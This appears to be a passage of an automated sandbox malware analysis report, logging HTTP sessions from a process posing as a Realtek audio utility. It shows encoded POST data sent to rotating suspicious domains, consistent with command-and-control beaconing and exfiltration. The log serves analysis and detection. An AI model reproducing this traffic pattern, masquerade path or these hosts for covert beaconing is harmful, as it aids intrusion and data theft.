                                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                          Jan 9, 2025 16:47:27.946958065 CET | 1289 | IN
                                                                          Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                          Jan 9, 2025 16:47:27.947000980 CET | 1289 | IN
                                                                          Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                          Jan 9, 2025 16:47:27.947042942 CET | 1289 | IN
                                                                          Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                          Jan 9, 2025 16:47:27.947077990 CET | 661 | IN
                                                                          Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                          Jan 9, 2025 16:47:27.947110891 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          1 | 192.168.11.20 | 49746 | 198.58.118.167 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:47:43.426031113 CET | 789 | OUT | POST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
                                                                          Jan 9, 2025 16:47:43.570617914 CET | 806 | IN | HTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:47:43 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          2 | 192.168.11.20 | 49747 | 198.58.118.167 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:47:46.107495070 CET | 809 | OUT | POST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrYsDqpC6OzOxTo1zBzxSkI=
                                                                          Jan 9, 2025 16:47:46.253424883 CET | 805 | IN | HTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:47:46 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          3 | 192.168.11.20 | 49748 | 198.58.118.167 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:47:49.788150072 CET | 2578 | OUT | POST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:47:49.788182974 CET | 2578 | OUT
                                                                          Jan 9, 2025 16:47:49.930634022 CET | 2578 | OUT
                                                                          Jan 9, 2025 16:47:49.930962086 CET | 224 | OUT
                                                                          Jan 9, 2025 16:47:50.075325966 CET | 805 | IN | HTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:47:50 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          4 | 192.168.11.20 | 49749 | 198.58.118.167 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:47:52.461357117 CET | 528 | OUT | GET /jwa9/?lV=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:47:52.606264114 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:47:52 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          connection: close
                                                                          Data Ascii: 495<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736437672.0002114916&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICJsVj1uYkViNkJhcGpyQ1lkM3ZwSVU2NWRSVGFvUEsyYzQ4NFo5RExlbFRjcko0cDhoT2lCcGxJMzl6dHpoYWFsNzZxRllLZThvb0pGMjJtSS9KdlJQUjlLWnRFUHNHUFNadnBIejRnS1JiOVJIdGl2ODdTWnd4TXlJaz0mTFNiYVQ9emZ0NExvQnciLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45 [TRUNCATED]
                                                                          Jan 9, 2025 16:47:52.606270075 CET | 52 | IN
                                                                          Data Ascii: } </script> </body></html>0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          5 | 192.168.11.20 | 49750 | 104.21.96.1 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:47:57.918406963 CET | 795 | OUT | POST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoZeIvSWiQvaM24JM4PFTHw==
                                                                          Jan 9, 2025 16:47:58.492090940 CET | 820 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:47:58 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oi9rZc1DajXu1cLSVCN7jLyQ0aRms2gZLp75UQAdmOBAl%2FnlViuBI%2FP6bavjHK%2FBc19EvmEP%2B8Jebj5TPgTCOybMbJhDkVvHqHCqAKCSNYm1segd3upbK2Cayc8M9%2Bio26BT"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff5919f6c076075-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118823&min_rtt=118823&rtt_var=59411&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data: [gzip-compressed body data]
                                                                          Jan 9, 2025 16:47:58.492100954 CET | 105 | IN | [gzip-compressed body data, continued]
                                                                          Jan 9, 2025 16:47:58.492109060 CET | 5 | IN | 0\r\n\r\n


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          6 | 192.168.11.20 | 49751 | 104.21.96.1 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:00.565758944 CET | 815 | OUT | POST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Qn/BfhDq36o+7wuiOd0jo=
                                                                          Jan 9, 2025 16:48:01.112435102 CET | 913 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:01 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXhyTWjNyFWLhCq5LJQ0mJ1gXWo415ILhjEOrR%2BMXrpKAw1%2FL7GYDUIKWJKg%2B7YEDrue1SLJyti%2Bd0cIvAcyyTyTD5EgOn3DpsiSUPX03ar1byJ4HZ27nn9LC587PAUEFgi7"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff591affb8fa482-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=120227&min_rtt=120227&rtt_var=60113&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data: [gzip-compressed body data]
                                                                          Jan 9, 2025 16:48:01.112481117 CET | 5 | IN | 0\r\n\r\n


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          7 | 192.168.11.20 | 49752 | 104.21.96.1 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:03.222157001 CET | 7964 | OUT | POST /3u0p/ HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mzkd6gp5.top
                                                                          Referer: http://www.mzkd6gp5.top/3u0p/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:03.753026009 CET | 912 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:03 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zELVCdTgKqAqAvxAEYSCyv85anV331n63HVrbhVhkxEHdyqn6GB7W2T4qdp%2B%2B2C1mSmGBfD7SjEhQ3dVNHOMr7Op3CJVMDgnT3Mmj1ta1A%2BeVxfSwNsq5LcGeWywdxWMNd7X"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff591c08a05a482-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=120105&min_rtt=120105&rtt_var=60052&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7964&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data: [gzip-compressed body data]
                                                                          Jan 9, 2025 16:48:03.753072023 CET | 5 | IN | 0\r\n\r\n


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          8 | 192.168.11.20 | 49753 | 104.21.96.1 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:05.875560045 CET | 530 | OUT | GET /3u0p/?lV=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:06.418689966 CET | 932 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:06 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2FjrVcVQEWt6V7%2B9%2BJAhwqZHBpNWakYQZCxhzY3EL4%2B29uL2NKdnjArQ6U6LXWuFA0GSCdb%2FNC0jdG%2FkRdwev5CB%2FKJ3YPWg6Fad2EdiZeOdEsHUqp4Uf6rYFsawNnL5vDyo"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff591d12c780298-ORD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=119802&min_rtt=119802&rtt_var=59901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 9, 2025 16:48:06.418703079 CET | 5 | IN | 0\r\n\r\n


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          9 | 192.168.11.20 | 49754 | 199.192.21.169 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:11.785504103 CET | 789 | OUT | POST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bVgtf9ljMNCh6pfvdIcBvA==
                                                                          Jan 9, 2025 16:48:11.979461908 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:11 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          10 | 192.168.11.20 | 49755 | 199.192.21.169 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:14.490849018 CET | 809 | OUT | POST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEEabwAuk1rbdIAz/Z5zQzI=
                                                                          Jan 9, 2025 16:48:14.679184914 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:14 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          11 | 192.168.11.20 | 49756 | 199.192.21.169 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:17.193728924 CET | 7958 | OUT | POST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:17.382185936 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:17 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          12 | 192.168.11.20 | 49757 | 199.192.21.169 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:19.894273996 CET | 528 | OUT | GET /qps0/?lV=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:20.080899954 CET | 933 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:19 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          13 | 192.168.11.20 | 49758 | 47.83.1.90 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
